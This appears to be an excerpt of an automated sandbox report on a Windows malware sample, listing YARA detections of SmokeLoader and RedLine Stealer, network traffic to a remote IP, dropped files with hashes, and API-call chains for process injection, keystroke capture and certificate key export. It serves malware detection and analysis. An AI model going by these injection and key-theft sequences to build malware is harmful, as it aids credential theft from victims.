                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49761 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR
                Source: Yara matchFile source: 6.2.E647.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.E647.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.uejbbri.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.E647.exe.2610000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.uejbbri.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.uejbbri.24a0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0309162B GetKeyboardState,ToUnicode,16_2_0309162B
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB873220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,8_2_00007FF7CB873220

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,4_2_00403277
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,6_2_00403043
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004014C4 LocalAlloc,NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014C4
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_00401508 NtAllocateVirtualMemory,6_2_00401508
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004014CF NtAllocateVirtualMemory,6_2_004014CF
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015D5
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004014DE NtAllocateVirtualMemory,6_2_004014DE
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015DF
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015E6
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F2
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004014F5 NtAllocateVirtualMemory,6_2_004014F5
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004014F8 NtAllocateVirtualMemory,6_2_004014F8
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004014FB NtAllocateVirtualMemory,6_2_004014FB
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,7_2_00403043
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004014C4 LocalAlloc,NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014C4
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_00401508 NtAllocateVirtualMemory,7_2_00401508
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004014CF NtAllocateVirtualMemory,7_2_004014CF
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004014DE NtAllocateVirtualMemory,7_2_004014DE
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015DF
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015E6
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015F2
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004014F5 NtAllocateVirtualMemory,7_2_004014F5
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004014F8 NtAllocateVirtualMemory,7_2_004014F8
                Source: C:\Users\user\AppData\Roaming\uejbbriCode function: 7_2_004014FB NtAllocateVirtualMemory,7_2_004014FB
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03274B92 RtlMoveMemory,NtUnmapViewOfSection,9_2_03274B92
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032733C3 NtQueryInformationFile,9_2_032733C3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0327342B NtQueryObject,NtQueryObject,RtlMoveMemory,9_2_0327342B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0327349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,9_2_0327349B
                Source: C:\Windows\explorer.exeCode function: 11_2_001D38B0 NtUnmapViewOfSection,11_2_001D38B0
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,12_2_03221016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221A80 NtCreateSection,NtMapViewOfSection,12_2_03221A80
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,12_2_03221819
                Source: C:\Windows\explorer.exeCode function: 13_2_00D2355C NtUnmapViewOfSection,13_2_00D2355C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_03091016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_03091016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_03091B26 NtCreateSection,NtMapViewOfSection,16_2_03091B26
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_030918BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_030918BF
                Source: C:\Windows\explorer.exeCode function: 18_2_0062370C NtUnmapViewOfSection,18_2_0062370C
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB879AC88_2_00007FF7CB879AC8
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB87B4248_2_00007FF7CB87B424
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB8732208_2_00007FF7CB873220
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB87DC088_2_00007FF7CB87DC08
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB87A51C8_2_00007FF7CB87A51C
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB87213C8_2_00007FF7CB87213C
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB87A7748_2_00007FF7CB87A774
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032721989_2_03272198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0328B35C9_2_0328B35C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0327C2F99_2_0327C2F9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032C44389_2_032C4438
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0328B97E9_2_0328B97E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03295F089_2_03295F08
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03276E6A9_2_03276E6A
                Source: C:\Windows\explorer.exeCode function: 11_2_001D1E2011_2_001D1E20
                Source: C:\Windows\explorer.exeCode function: 13_2_00D2205413_2_00D22054
                Source: C:\Windows\explorer.exeCode function: 13_2_00D2286013_2_00D22860
                Source: C:\Windows\explorer.exeCode function: 18_2_006220F418_2_006220F4
                Source: C:\Windows\explorer.exeCode function: 18_2_00622A0418_2_00622A04
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\B575.exe A6F7D8211414EF77E92730DB874BABF8F200B07C5AA194A71FA00F2C8BE5BDE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\E647.exe 2E4015F84A9A6D9C22EF65ACC66A3CF55C2CABC2D7A6F32B96297CA7D0F56EA4
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\uejbbri 2E4015F84A9A6D9C22EF65ACC66A3CF55C2CABC2D7A6F32B96297CA7D0F56EA4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 03278801 appears 40 times
                Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 03277F70 appears 32 times
                Source: KTh1gQlT9a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
